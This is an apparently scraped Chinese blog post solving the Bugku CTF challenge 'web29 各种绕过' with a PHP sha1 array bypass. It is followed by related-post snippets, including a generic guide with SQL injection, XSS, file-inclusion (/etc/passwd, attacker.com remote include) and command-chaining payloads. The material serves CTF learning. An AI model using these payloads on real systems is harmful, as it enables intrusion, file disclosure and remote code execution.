bugku web29 各种绕过

最新推荐文章于 2025-10-24 11:51:37 发布
原创 最新推荐文章于 2025-10-24 11:51:37 发布 · 240 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#bugku #ctf #web

题目:

<?php
highlight_file('flag.php');
$_GET['id'] = urldecode($_GET['id']);
$flag = 'flag{xxxxxxxxxxxxxxxxxx}';
if (isset($_GET['uname']) and isset($_POST['passwd'])) {
    if ($_GET['uname'] == $_POST['passwd'])

        print 'passwd can not be uname.';

    else if (sha1($_GET['uname']) === sha1($_POST['passwd'])&($_GET['id']=='margin'))

        die('Flag: '.$flag);

    else

        print 'sorry!';

}
?>

分析:
sha和md5都是哈希函数,md5数组返回NULL,尝试一下sha可不可以这样操作

构造url?id=margin&uname[]=1,再post&passwd[]=2
在这里插入图片描述

PRCORANGE
关注
Bugku CTF_Web——各种绕过
weixin_71914594的博客
10-25 1532
如果 uname 和 passwd 的 sha1 哈希值相等,且 $_GET[‘id’] 等于 ‘margin’,则会输出 Flag: flag{xxxxxxxxxxxxxxxxxx},即打印出 $flag 的值。首先判断 $_GET[‘uname’] 是否等于 $_POST[‘passwd’],如果两者相等,则会输出 “passwd can not be uname.”,并不满足获取 $flag 的条件。$_GET[‘uname’] 和 $_POST[‘passwd’] 的 sha1 哈希值相等。
BugkuCTF_Web——“各种绕过”、“web8”、“细心”
Ho1aAs‘s Blog
10-24 638
文章目录一、“各种绕过”二、“web8”三、“细心”完 一、“各种绕过” 访问环境,审计代码 需要POST$passwd,GET$id和$uname 而且passwd和uname需要绕过sha1函数,并且二者值不等,这里考虑数组绕过 做法如下: 二、“web8” 题目提示txt 访问环境,先审计代码 第二行进行了变量覆盖,需要将文件名赋给$fn,将文件内容赋给$ac,就能获得flag 根据提示,尝试访问flag.txt 因此直接获得flag flag{3cfb7a90fc0de31} 三、“
Bugku web29 各种绕过
weixin_44522540的博客
02-24 273
二十七、web29 各种绕过 <?php highlight_file('flag.php'); $_GET['id'] = urldecode($_GET['id']); $flag = 'flag{xxxxxxxxxxxxxxxxxx}'; if (isset($_GET['uname']) and isset($_POST['passwd'])) { if ($_GET['uname'] == $_POST['passwd']) print 'passwd can no
bugku web29各种绕过
m0_52432374的博客
04-04 155
bugku web29 <?php highlight_file('flag.php'); $_GET['id'] = urldecode($_GET['id']); $flag = 'flag{xxxxxxxxxxxxxxxxxx}'; if (isset($_GET['uname']) and isset($_POST['passwd'])) { if ($_GET['uname'] == $_POST['passwd']) print 'passwd can not
BugKu Web渗透之各种绕过
cai_huaer的博客
06-12 531
看代码,就是需要三个参数,其中id和uname是get请求,passwd是post请求。然后uname和passed不能相等,但是他们的sha1值需要全等于(类型也要一样),id参数的值在url解码后为margin。当然,也可以在bp中直接更改加参数,我个人觉得hacker bar更加方便。再想想,如果都是数组的话经过加密后也是Null,那么这样对比应该也是一样的,于是尝试把uname和passwd改成数组。首先因为是英文margin,所以url加密后也是margin。尝试请求,结果flag出现,如下图。
bugku web-各种绕过
weixin_46578840的博客
08-09 259
打开网址得到代码 <?php highlight_file('flag.php'); $_GET['id'] = urldecode($_GET['id']); $flag = 'flag{xxxxxxxxxxxxxxxxxx}'; if (isset($_GET['uname']) and isset($_POST['passwd'])) { if ($_GET['uname'] == $_POST['passwd']) print 'passwd can not be
Bugku_web_各种绕过
qq_68457525的博客
07-14 478
ctf练习之哈希绕后和简单代码审计
Bugku-Web题目-各种绕过
2401_86518996的博客
10-24 427
经过观察,题目要求上传三个变量,以 get 方式传递 id 和 uname 两个变量,以 POST 方式传递 passwd 变量。PHP的 sha1() 函数在处理数组时,会返回 NULL ,那么,如果 uname 和 passwd 都是数组,那么就能满足条件。要求 uname 和 passwd 二者值的sha1哈希值相等,并且“id”的值为margin。打开bp和内置浏览器,先通过url框以get方式提交 id 和 uname ,并开启拦截模式。将底下的参数移到url那边,并将passwd加上。
bugku-web-各种绕过
qq_75121443的博客
04-12 706
这里就简单考察了一下同时判断get参数和post参数应该如何处理。这里离谱的就是只能用hackbar才行,用bp无法成功。一个明显的传参绕过题目。这是我最后构成的报文。
ctf.bugku-各种绕过
guanrongl的专栏
10-10 666
最后构造payload ,bp要加个头部 Content-Type: application/x-www-form-urlencoded。sha1、md5 都能通过数组绕过
bugku web题集锦
skysys的研究小屋
06-01 1650
变量1 <?php error_reporting(0); include "flag1.php"; highlight_file(__file__); if(isset($_GET['args'])){ $args = $_GET['args']; if(!preg_match("/^\w+$/",$args)){ die("args error!"); } eval("var_dump($$args);"); } ?> 正则在线测试:ht
BUGKU--web详解
qq_49422880的博客
05-28 2302
web5-web?前言Web4Web5Web6Web7Web8game1Web11社工-伪造一级目录一级目录 前言   听说bugku的题很适合新手我就来了,感觉前几题都比较简单也没什么好总结的,就从第四题开始吧,后面要是碰到简单的估计只会略微提起几句,大家要是有不理解的知识点,可以私信我。 Web4   就是考察简单的代码审计,只需要传递的what的变量等于flag即可,于是我们可以构造一个payload,用win10的cmd发送,用Burpsuite抓包返包或则firefox的harbar也可以完成这个
Bugku WEB 都过滤了
qq_41696858的博客
07-25 1148
这题呢,网上有很多解法,那都是这个题目没有完善之前的,现在来说已经修复的差不多了,像以前的直接/flag当然行不通,源码泄露啥的也被删了 严格来说,其实这是一道sql注入题 打开场景,啥提示没有,那就dirsearch扫一波,在一番查找过后,发现images文件夹下有一张图片,那就是作者给的提示,也就是不是数字开头的字符串在比较时会自动转成0 那么他的提示里0=0也就是永真,所以可以爆出所有的用户名 友情小tips:三个0异或不是1,而是0,不要想当然,这就是一个存粹的数学问题 最后一个式子给出了如何有条件
基于DE2-115开发板使用VHDL硬件描述语言在QuartusII软件环境中设计并实现的一个具备完整时间显示手动校时与可编程闹铃功能的二十四小时制数字时钟系统_该核心项目通过.zip
01-02
基于DE2-115开发板使用VHDL硬件描述语言在QuartusII软件环境中设计并实现的一个具备完整时间显示手动校时与可编程闹铃功能的二十四小时制数字时钟系统_该核心项目通过.zip
PostgreSQL开发指南项目_提供PostgreSQL数据库开发全面指导的PDF电子书与配套视频教程资源库_包含详细的SQL脚本执行顺序说明与示例数据初始化步骤_旨在帮助数据库.zip
01-02
PostgreSQL开发指南项目_提供PostgreSQL数据库开发全面指导的PDF电子书与配套视频教程资源库_包含详细的SQL脚本执行顺序说明与示例数据初始化步骤_旨在帮助数据库.zip
基于DBUtils库实现Django数据库连接池的增强插件支持MySQL与PostgreSQL数据库后端提供高性能可配置的连接管理解决方案有效减少数据库连接开销提升Web.zip
01-02
基于DBUtils库实现Django数据库连接池的增强插件支持MySQL与PostgreSQL数据库后端提供高性能可配置的连接管理解决方案有效减少数据库连接开销提升Web.zip
android调用内部组件
最新发布
01-02
根据原作 https://pan.quark.cn/s/a4b39357ea24 的源码改编 在Android开发领域中,`<include>`标签是一种极具价值的特性,它支持布局文件的复用,从而优化代码的可维护性并降低冗余的产生。 借助`<include>`功能,开发者能够将一个或多个界面元素整合至一个统一的布局文件中,并在其他界面设计中加以应用。 这种做法在构建复杂的用户界面时显得尤为得力,因为它推动了模块化架构的实施。 在演示的案例中,存在两个XML布局文档:`sublayout.xml`以及`mail.xml`。 `sublayout.xml`文档内含一个垂直排列的LinearLayout,其中包含了TextView与Button两个元素。 而`mail.xml`则作为主布局,不仅拥有其自身的组件(例如TextView和Button),还运用`<include>`标签将`sublayout.xml`引入了两次,分别标记为`@+id/main1`和`@+id/main2`。 在`mail.xml`文档中,可以看到两个`<include>`标签,它们均设定了`layout="@layout/sublayout"`属性,表明`sublayout.xml`的内容将被置入这两个位置。 每个`<include>`标签都能独立地为内部元素设定ID,以便在程序代码中进行访问和操控。 在`AndroidIncludeLayout`类中,首先通过`setContentView(R.layout.main)`方法加载`mail.xml`布局。 随后,使用`findViewById()`方法定位`main1`和`main2`视图对象,并分别赋予`subLayout1`和`subLayout2`变量。 接着...
CiscoPacketTracer网络仿真与协议分析综合实验平台_网络拓扑构建数据包追踪路由器配置交换机管理无线网络模拟IPv4IPv6协议栈ACL访问控制列表NA.zip
01-02
CiscoPacketTracer网络仿真与协议分析综合实验平台_网络拓扑构建数据包追踪路由器配置交换机管理无线网络模拟IPv4IPv6协议栈ACL访问控制列表NA.zip
语言与编程项目是一个全面收集和整理计算机语言相关技术文档学习笔记官方手册及编程实践案例的综合性知识库旨在为开发者学生及技术爱好者提供一个系统化结构化的学习与参考平台内容.zip
01-02
语言与编程项目是一个全面收集和整理计算机语言相关技术文档学习笔记官方手册及编程实践案例的综合性知识库旨在为开发者学生及技术爱好者提供一个系统化结构化的学习与参考平台内容.zip
bugku web计算机题解
10-11
由于没有具体的bugku平台web计算机题目,难以直接提供题解。不过一般来说,bugku平台的web题目涉及多种类型,以下是一些常见web漏洞类型题目的通用解题思路和示例代码说明。 ### SQL注入题解思路 SQL注入是通过构造恶意的SQL语句来绕过应用程序的验证,获取数据库中的信息。 #### 检测注入点 可以使用一些特殊字符,如单引号 `'`、双引号 `"` 等,观察页面返回的错误信息来判断是否存在注入点。 #### 利用注入漏洞获取信息 例如,使用联合查询(UNION)来获取数据库中的数据。 ```python import requests url = "http://example.com/search.php?id=1" # 构造注入语句,使用联合查询获取数据库名 payload = "' UNION SELECT 1, database(), 3 -- " new_url = url + payload response = requests.get(new_url) print(response.text) ``` ### XSS(跨站脚本攻击)题解思路 XSS攻击是通过在网页中注入恶意脚本,当用户访问该页面时,脚本会在用户的浏览器中执行。 #### 反射型XSS 在输入框中输入恶意脚本,观察页面是否将脚本原样输出并执行。 ```html <script>alert('XSS')</script> ``` #### 存储型XSS 将恶意脚本存储到网站的数据库中,当其他用户访问包含该脚本的页面时,脚本会执行。 ### 文件包含漏洞题解思路 文件包含漏洞是指应用程序在包含文件时,没有对用户输入的文件名进行严格的过滤,导致可以包含任意文件。 #### 本地文件包含(LFI) 构造包含本地文件的路径,如 `/etc/passwd`(在Linux系统中)。 ```plaintext http://example.com/index.php?file=../../../../etc/passwd ``` #### 远程文件包含(RFI) 如果应用程序支持远程文件包含,构造包含远程文件的URL。 ```plaintext http://example.com/index.php?file=http://attacker.com/malicious_file.php ``` ### 命令执行漏洞题解思路 命令执行漏洞是指应用程序在执行系统命令时,没有对用户输入的命令进行严格的过滤,导致可以执行任意系统命令。 #### 利用命令连接符执行命令 在输入框中输入命令连接符,如 `;`、`&&` 等,执行其他系统命令。 ```plaintext ls -la; ```
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值